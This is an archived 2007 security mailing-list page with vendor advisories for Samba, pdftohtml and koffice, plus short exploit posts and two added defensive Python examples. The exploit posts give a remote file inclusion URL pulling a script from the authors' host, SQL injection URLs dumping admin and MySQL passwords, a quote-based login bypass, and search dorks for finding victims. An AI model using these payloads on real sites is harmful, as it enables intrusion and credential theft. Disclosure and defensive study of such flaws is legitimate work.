[ MDKSA-2007:224 ] - Updated samba packages fix vulnerabilities

2007-11-17 Thread security

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___
 
 Mandriva Linux Security Advisory MDKSA-2007:224
 http://www.mandriva.com/security/
 ___
 
 Package : samba
 Date: November 17, 2007
 Affected: 2007.0, 2007.1, 2008.0, Corporate 3.0, Corporate 4.0
 ___
 
 Problem Description:
 
 The samba developers discovered that nmbd could be made to overrun a
 buffer during the processing of GETDC logon server requests.  If samba
 is configured as a Primary or Backup Domain Controller, this could
 be used by a remote attacker to send malicious logon requests and
 possibly cause a denial of service (CVE-2007-4572).
 
 As well, Alin Rad Pop of Secunia Research found that nmbd did not
 properly check the length of netbios packets.  If samba is configured
 as a WINS server, this could be used by a remote attacker able to
 send multiple crafted requests to nmbd, resulting in the execution
 of arbitrary code with root privileges (CVE-2007-5398).
 
 The updated packages have been patched to correct these issues.
 ___

 References:
 
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4572
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5398
 ___
 
 Updated Packages:
 

[ MDKSA-2007:223 ] - Updated pdftohtml packages fix vulnerabilities

2007-11-17 Thread security

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___
 
 Mandriva Linux Security Advisory MDKSA-2007:223
 http://www.mandriva.com/security/
 ___
 
 Package : pdftohtml
 Date: November 17, 2007
 Affected: 2007.0, 2007.1
 ___
 
 Problem Description:
 
 Alin Rad Pop found several flaws in how PDF files are handled
 in pdftohtml.  An attacker could create a malicious PDF file that
 would cause pdftohtml to crash or potentially execute arbitrary code
 when opened.
 
 The updated packages have been patched to correct this issue.
 ___

 References:
 
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4352
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5392
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5393
 ___
 
 Updated Packages:
 
 ___

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 ___

 Type Bits/KeyID Date   User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  



[ MDKSA-2007:222 ] - Updated koffice packages fix vulnerabilities

2007-11-17 Thread security

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___
 
 Mandriva Linux Security Advisory MDKSA-2007:222
 http://www.mandriva.com/security/
 ___
 
 Package : koffice
 Date: November 17, 2007
 Affected: 2007.1, 2008.0
 ___
 
 Problem Description:
 
 Alin Rad Pop found several flaws in how PDF files are handled
 in koffice.  An attacker could create a malicious PDF file that
 would cause koffice to crash or potentially execute arbitrary code
 when opened.
 
 The updated packages have been patched to correct this issue.
 ___

 References:
 
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4352
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5392
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5393
 ___
 
 Updated Packages:
 

Sciurus Hosting Panel Code Injection

2007-11-17 Thread admin
Exploit Link : http://www.r57.li/exploit.txt


security contact for mitsubishi electric?

2007-11-17 Thread Chris Withers

Hi All,

I believe I've found some potentially serious security weaknesses in 
Mitsubishi Electric's GB-50A web-based aircon controller.
(ie: being able to turn off all aircon in a building if it's run by one 
of these ;-) )


Anyone have any idea how best to get hold of someone at Mitsubishi that 
can actually do anything about this?


cheers,

Chris

--
Simplistix - Content Management, Zope & Python Consulting
   - http://www.simplistix.co.uk


Myspace Clone Script (index.php) Remote File Inclusion Vulnerability

2007-11-17 Thread verys-secret

found by : VerY-SecReT <>[SnipEr's TeaM]

HomePage : WwW.SnIpEr-Sa.Com

DORK (altavista.com): "Search | Invite | Mail | Blog | Forum"

EX: http://victim/index.php?pg=http://www.sniper-sa.com/sn2.txt?

S.GreetZ: sniper-sa.com & SnIpEr-Sa & Rafoo

ThanX To: ShoOt3r , 911 , 3badi , Devil-X , Mr.Max , Golden Hacker

Contact : [EMAIL PROTECTED]  & http://www.sniper-sa.com





Black Lily 2007 (products.php class) Remote SQL Injection Vulnerability

2007-11-17 Thread verys-secret




found by : VerY SecReT

HomePage : WwW.SnIpEr-Sa.Com

Dork : "Powered By The Black Lily 2007"

EXPLOIT:

http://victim.com/ar/products.php?class=-1%20union%20select%201,2,password,4,username%20from%20admin/*

or

http://victim.com/en/products.php?class=-1%20union%20select%201,2,3,password,username%20from%20admin/*

Admin Panel is in  http://victim.com/xx/admin/

S.GreetZ: sniper-sa.com & sniper-sa & Rafoo

thanx :  shoot3r , Devil-X ,ReMOTeR , and all sniper members

contact-mail : [EMAIL PROTECTED]




net-finity (links.php) Remote SQL Injection Vulnerability

2007-11-17 Thread verys-secret

found by : VerY-SecReT <>[SnipEr's TeaM]

HomePage : WwW.SnIpEr-Sa.Com

DorK: "Designed & Developed by net-finity" Or "inurl:links.php?link_id="

EX: http://localhost/links.php?link_id=-99%20union%20select%201,user,password,4,5,6,7,8,9%20from%20mysql.user/*

some web bug in

EX: http://localhost/links.php?link_id=-99%20union%20select%201,2,3,4,password,user,7,8,69,10,11%20from%20mysql.user/*

S.GreetZ: sniper-sa.com & SnIpEr-Sa & Rafoo

ThanX To: ShoOt3r , 911 , 3badi , Devil-X , Mr.Max , Golden Hacker

Contact : [EMAIL PROTECTED]  & http://www.sniper-sa.com
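
Added detection example, not part of the original posts: the three VerY-SecReT posts above place a remote URL in the pg parameter and a percent-encoded "union select" in the class and link_id parameters, so searching raw web access logs for the plain strings misses them. The sketch below decodes every query parameter before matching; the log lines, addresses and host names are constructed, and the function names are hypothetical.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample access-log lines (documentation addresses and hosts).
SAMPLE_LOG = [
    '203.0.113.5 - - [17/Nov/2007:10:00:01 +0000] "GET /index.php?pg=home HTTP/1.1" 200 5120',
    '203.0.113.9 - - [17/Nov/2007:10:00:07 +0000] "GET /index.php?pg=http://files.example/inc.txt? HTTP/1.1" 200 812',
    '198.51.100.7 - - [17/Nov/2007:10:01:12 +0000] "GET /en/products.php?class=-1%20union%20select%201,2,3,password,username%20from%20admin/* HTTP/1.1" 200 2048',
    '198.51.100.7 - - [17/Nov/2007:10:01:40 +0000] "GET /links.php?link_id=-99+UNION+SELECT+1,user,password+from+mysql.user/* HTTP/1.1" 200 2048',
    '192.0.2.44 - - [17/Nov/2007:10:02:03 +0000] "GET /links.php?link_id=12 HTTP/1.1" 200 4096',
    '192.0.2.44 - - [17/Nov/2007:10:02:09 +0000] "GET /search.php?q=credit+union+selection+criteria HTTP/1.1" 200 4096',
]

# Request line inside a common/combined-format log entry.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# A parameter whose decoded value starts with an absolute URL (file-inclusion pattern).
REMOTE_URL_RE = re.compile(r'^\s*(?:https?|ftp)://', re.I)
# UNION [ALL] SELECT as whole words, matched after decoding.
UNION_SELECT_RE = re.compile(r'\bunion\s+(?:all\s+)?select\b', re.I)


def classify_request(target):
    """Return [(parameter, finding), ...] for one request target."""
    findings = []
    query = urlsplit(target).query
    # parse_qsl percent-decodes values and turns '+' into a space.
    for name, value in parse_qsl(query, keep_blank_values=True):
        if REMOTE_URL_RE.search(value):
            findings.append((name, "remote-url-in-parameter"))
        if UNION_SELECT_RE.search(value):
            findings.append((name, "union-select-in-parameter"))
    return findings


def scan(lines):
    """Return [(line number, client, parameter, finding), ...] for a log."""
    hits = []
    for lineno, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        if not match:
            continue  # not a request line this sketch understands
        client = line.split(" ", 1)[0]
        for name, finding in classify_request(match.group(1)):
            hits.append((lineno, client, name, finding))
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

A parameter that legitimately carries a URL (a redirect target, for instance) will also be reported, which is why the parameter name is part of each hit.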





Re: Microsoft Jet Engine MDB File Parsing Stack Overflow Vulnerability

2007-11-17 Thread CaseArmour.net Security Administrator
It would be useful to know if this is also an issue with msjet40.dll
4.0.9510.0 (Windows Server 2003 SP2 + hotfixes).  I have an installer
for Windows XP SP2 that -- seems -- to cleanly apply Windows Server 2003
SP2's MDAC 2.82.  I haven't been able to give it a serious, hard testing
because I don't have many apps that still use MDAC.

On Fri, 16 Nov 2007 19:25:29 +0800, "cocoruder" <[EMAIL PROTECTED]>
said:
>
> (C:\Windows\System32\msjet40.dll, version is 4.0.8618.0)


RE: Standing Up Against German Laws - Project HayNeedle

2007-11-17 Thread Quark IT - Hilton Travis
> -Original Message-
> From: Florian Echtler [mailto:[EMAIL PROTECTED]
> Sent: Tuesday, 13 November 2007 20:00
> 
> > If I read the law correctly, it requires retention of "what IP
> > connected to another IP" and "which phone number called where." It
> > doesn't bother retaining the URL called (my German is rusty, so I may
> > be a little off in my interpretation). Connecting to a random IP on a
> > random open port (80 and 443, for example) would be a good start to
> > accomplish the goal creating chatter. The issue is that the search
> > terms to find those ports could lead to connecting to a site that
> > increases your profile against general background chatter, even as it
> > is raised with random connection traffic.
> As a native German speaker, allow me to clarify: with respect to IP
> communication, the law mandates saving the following information for 6
> months:
> 
> - which customer was assigned which IP for what timespan
> - sender mail address, receiver mail address and sender IP for each
> mail
> - in case of VOIP: caller and callee phone number and IP address
> 
> So it wouldn't make much sense to create connection noise on a TCP or
> HTTP basis, as this stuff isn't logged. I think one should rather
> concentrate on generating email noise in this regard.
> 
> Yours, Florian

Hi Florian,

The issue with sending email noise is that there is already too much of
it already and it is already classified under the banner "spam".  I can
almost guarantee that were you to start sending random email to many
servers, most of their owners would block your IP immediately, or at
least look at ways of adding you to RBLs and reporting you to whichever
authorities are responsible for enforcing anti-spam and anti-DOS laws.

--

"I'd rather be DOSed than VISTAd" - Hilton Travis, 2007

Regards,

Hilton Travis  Phone: +61 (0)7 3105 9101
(Brisbane, Australia)  Phone: +61 (0)419 792 394
Manager,  Quark IT www.quarkit.com.au
Director, Quark Group  www.quarkgroup.com.au

War doesn't determine who is right.  War determines who is left.

This document and any attachments are for the intended recipient 
  only.  It may contain confidential, privileged or copyright 
 material which must not be disclosed or distributed.

Quark Group Pty. Ltd.
  T/A Quark Automation, Quark AudioVisual, Quark IT


[USN-544-2] Samba regression

2007-11-17 Thread Jamie Strandboge
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

===
Ubuntu Security Notice USN-544-2  November 16, 2007
samba regression
CVE-2007-4572, https://launchpad.net/bugs/163042
===

A security issue affects the following Ubuntu releases:

Ubuntu 6.06 LTS
Ubuntu 6.10
Ubuntu 7.04
Ubuntu 7.10

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 6.06 LTS:
  samba   3.0.22-1ubuntu3.5

Ubuntu 6.10:
  samba   3.0.22-1ubuntu4.4

Ubuntu 7.04:
  samba   3.0.24-2ubuntu1.4

Ubuntu 7.10:
  samba   3.0.26a-1ubuntu2.2

In general, a standard system upgrade is sufficient to effect the
necessary changes.

Details follow:

USN-544-1 fixed two vulnerabilities in Samba. Fixes for CVE-2007-5398
are unchanged, but the upstream changes for CVE-2007-4572 introduced a
regression in all releases which caused Linux smbfs mounts to fail.
Additionally, Dapper and Edgy included an incomplete patch which caused
configurations using NetBIOS to fail. A proper fix for these regressions
does not exist at this time, and so the patch addressing CVE-2007-4572
has been removed. This vulnerability is believed to be an unexploitable
denial of service, but a future update will address this issue. We
apologize for the inconvenience.

Original advisory details:

 Samba developers discovered that nmbd could be made to overrun
 a buffer during the processing of GETDC logon server requests.
 When samba is configured as a Primary or Backup Domain Controller,
 a remote attacker could send malicious logon requests and possibly
 cause a denial of service. (CVE-2007-4572)

 Alin Rad Pop of Secunia Research discovered that nmbd did not properly
 check the length of netbios packets. When samba is configured as a WINS
 server, a remote attacker could send multiple crafted requests resulting
 in the execution of arbitrary code with root privileges. (CVE-2007-5398)


Updated packages for Ubuntu 6.06 LTS:


rPSA-2007-0241-1 samba samba-swat

2007-11-17 Thread rPath Update Announcements
rPath Security Advisory: 2007-0241-1
Published: 2007-11-16
Products:
rPath Linux 1

Rating: Critical
Exposure Level Classification:
Remote Root Deterministic Unauthorized Access
Updated Versions:
[EMAIL PROTECTED]:1/3.0.27-0.1-1
[EMAIL PROTECTED]:1/3.0.27-0.1-1

rPath Issue Tracking System:
https://issues.rpath.com/browse/RPL-1894

References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4572
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5398

Description:
Previous versions of the samba package are vulnerable to a remote
Arbitrary Code Execution attack when nmbd is configured as a WINS
server.

http://wiki.rpath.com/Advisories:rPSA-2007-0241

Copyright 2007 rPath, Inc.
This file is distributed under the terms of the MIT License.
A copy is available at http://www.rpath.com/permanent/mit-license.html


JiRos Upload Manager SQL Injection

2007-11-17 Thread no-reply
Aria-Security Team, 

http://Aria-Security.net

---

Shout Outs: AurA, imm02tal

Vendor: http://www.jiros.ne

Google Search: JBS v2.0, Powered by  JiRo´s.Net 



Path: files/login.asp

Username: anything' OR 'x'='x

Password: anything' OR 'x'='x



Regards,

The-0utl4w

Credits Goes To Aria-Security.Net

www.Aria-Security.Net
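
Added example, not code from the post or from the JiRos product: why the same quoted value in both login fields is accepted when a login query is built by string concatenation, and how parameter binding rejects it. The table layout, the query text and the use of SQLite in place of the application's ASP backend are assumptions made for illustration.

```python
import sqlite3

# The value given in the post for both the username and password fields.
PAYLOAD = "anything' OR 'x'='x"


def make_db():
    """In-memory database with one constructed account.

    The plaintext password column only mirrors the assumed legacy schema;
    a real fix would also store a salted password hash.
    """
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    db.execute("INSERT INTO users (username, password) VALUES ('admin', 'constructed-secret')")
    return db


def build_concatenated_query(username, password):
    """Legacy pattern: user input is pasted into the SQL text."""
    return ("SELECT username FROM users WHERE username = '" + username +
            "' AND password = '" + password + "'")


def login_vulnerable(db, username, password):
    # With PAYLOAD in both fields the WHERE clause becomes
    #   username = 'anything' OR 'x'='x' AND password = 'anything' OR 'x'='x'
    # AND binds tighter than OR, so the trailing OR 'x'='x' is true for every row.
    row = db.execute(build_concatenated_query(username, password)).fetchone()
    return row[0] if row else None


def login_parameterized(db, username, password):
    """Bound parameters are data only; quotes in them cannot change the query."""
    row = db.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


def quote_breaks_concatenation(db):
    """A legitimate name containing a quote is a syntax error when concatenated."""
    try:
        login_vulnerable(db, "o'brien", "pw")
    except sqlite3.OperationalError:
        return True
    return False


if __name__ == "__main__":
    db = make_db()
    print("concatenated :", login_vulnerable(db, PAYLOAD, PAYLOAD))
    print("parameterized:", login_parameterized(db, PAYLOAD, PAYLOAD))
    print("quote in name breaks concatenated query:", quote_breaks_concatenation(db))
```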